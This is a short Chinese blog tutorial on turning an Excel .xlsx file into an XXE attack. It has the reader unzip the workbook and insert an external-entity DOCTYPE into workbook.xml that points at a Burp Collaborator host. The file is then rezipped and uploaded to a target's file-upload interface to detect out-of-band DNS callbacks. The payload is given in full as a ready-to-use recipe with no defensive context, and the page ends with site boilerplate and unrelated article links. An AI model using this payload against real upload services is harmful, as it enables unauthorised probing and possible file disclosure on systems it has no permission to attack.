利用EXCEL进行XXE攻击

这篇具有很好参考价值的文章主要介绍了利用EXCEL进行XXE攻击。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

原因

Microsoft Office从2007版本引入了新的开放的XML文件格式,新的XML文件格式基于压缩的ZIP文件格式规范,由许多部分组成。

我们可以将其解压缩到特定的文件夹中来查看其包含的文件夹和文件,可以发现其中多数是描述工作簿数据、元数据、文档信息的XML文件。

我们创建一个excle,并解压

xl/drawings/drawing1.xml
xl/worksheets/sheet1.xml
xl/worksheets/_rels/sheet1.xml.rels
xl/sharedStrings.xml
xl/styles.xml
xl/workbook.xml
xl/_rels/workbook.xml.rels
_rels/.rels
[Content_Types].xml

利用EXCEL进行XXE攻击,excel
需要修改workbook.xml文件,以下内容插入第2行和第3行,SYSTEM后面自己添加相对应的dns记录均可,我习惯使用burp的collaborator模块

<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://gtdwmy7gvrncy5rvfu11kxzl2c82wr.burpcollaborator.net/"> ]>
<x>&xxe;</x>

添加好后重新打包成excle的后缀,如xxe.xlsx
此时恶意文件就做好了,找到对应的文件上传的接口,直接上传excle文件,观察dns是否有记录文章来源地址https://www.toymoban.com/news/detail-730909.html

到了这里,关于利用EXCEL进行XXE攻击的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【Python数据分析】利用Python将多个EXCEL表格合并为一个EXCEL表格

            如何将EXCEL的多个表格合并成一个表格呢?比如每月销售额是一个单独的表格,我想把它们合并成一个表格,今天就与大家分享如何利用Python数据分析3分钟搞定,不管你要合并多少个文件,代码总是那么几行。不多说了,上案例。          现在有3个月的销售额,需

    2023年04月24日
    浏览(50)
  • 利用ChatGPT编写Excel公式,对比讯飞星火与ChatGPT对Excel公式的回答

    借助国内ChatGPT平替+MindShow,飞速制作PPT 借助国内ChatGPT平替+markmap/Xmind飞速生成思维导图 借助国内ChatGPT平替+剪映/百度AIGC平台快速制作短视频 随着人工智能技术的不断发展,越来越多的应用程序开始支持自然语言处理,这使得我们可以使用自然语言与计算机进行交互。一个

    2024年02月05日
    浏览(45)
  • 利用Excel支持JUnit参数化测试

    在JUnit里面,可以使用CsvFileSource读取csv文件进行参数化测试,可是CSV文件不支持格式,编辑颇为麻烦,尤其是多次编辑,因此自然想到是否可以使用Excel文件,可以有各种格式,支持各类数据。 最新开源组件ExcelBDD提供了此功能,其maven导入代码如下 对于如下样子的Excel里面表

    2024年02月08日
    浏览(31)
  • 利用OpenXML获取Excel单元格背景色

    最近项目上遇到了关于Excel获取处理的问题,关于Excel单元格背景色的获取,水的文章都大同小异,都没注意到Excel单元格背景色是怎么赋值,这会导致出现有些背景色无法获取的情况。(PS:其实应该叫做前景色) 关于这点我们可以先来看一下,一个Excel文档的内部有关背景

    2024年02月08日
    浏览(50)
  • 从原理到实战,详解XXE攻击

    本文分享自华为云社区《【安全攻防】深入浅出实战系列专题-XXE攻击》,作者: MDKing。 XML基础:XML 指可扩展标记语言(Extensible Markup Language),是一种与HTML类似的纯文本的标记语言,设计宗旨是为了传输数据,而非显示数据。是W3C的推荐标准。 XML标签:XML被设计为具有自我

    2024年02月08日
    浏览(36)
  • XML外部实体注入攻击XXE

    xml是 扩展性标记语言 , 来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括 XML声明 、 DTD文档类型定义 (可选)、 文档元素 , 一般无法直接打开,可以选择用excl或记事本打开。 语言示例 ?xml version=”1.0” encoding=\\\"gb2312\\\" enc

    2024年02月07日
    浏览(44)
  • 利用fluxion进行WIFI钓鱼攻击的实验

    #利用fluxion进行WIFI钓鱼攻击的实验 免责声明: 本博客旨在提供有关wifi钓鱼攻击的基本知识和防范方法,仅供参考和教育目的。本博客不鼓励或支持任何非法或不道德的网络活动,也不对任何因使用或滥用本博客中的信息而造成的损失或损害承担任何责任。读者应该遵守相关

    2024年02月08日
    浏览(45)
  • 利用Floodlight进行DDOS攻击防御实验笔记

            Floodlight是Apache授权并基于JAVA开发的企业级OpenFlow控制器,当前最新版本是1.2。         Floodlight OpenFlow Controller -ProjectFloodlight:http://www.projectfloodlight.org/floodlight/         把同一时间,经过同一网络中具有某种共同特征或属性的数据抽象为一个流。比如,一般

    2024年02月07日
    浏览(55)
  • 【ChatGPT】如何利用ChatGPT来快速统计Excel数据?

    自从人工智能横空而出,它在人们的生活中产生了巨大的影响。尤其在企业办公领域,借助人工智能的力量,能够迅速产出丰富多样的内容,无论对于企业还是个人都具有重要的帮助。 想象一下,通过与人工智能的合作,您可以轻松地生成各种所需的文档、报告和演示稿,节

    2024年02月07日
    浏览(55)
  • 利用Python中的openpyxl/Pandas库操作excel

    本文主要讲述 openpyxl库对excel文件的读取写入操作以及Pandas库对excel文件的写入操作。 一、openpyxl介绍安装 1.安装openpyxl 2.Excel中的三大对象 二、openpyxl对Excel的操作  使用openpyxl读取excel 使用openpyxl写入excel         三、使用pandas写入excel python中与excel操作相关的模块: xlrd库

    2024年02月08日
    浏览(58)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包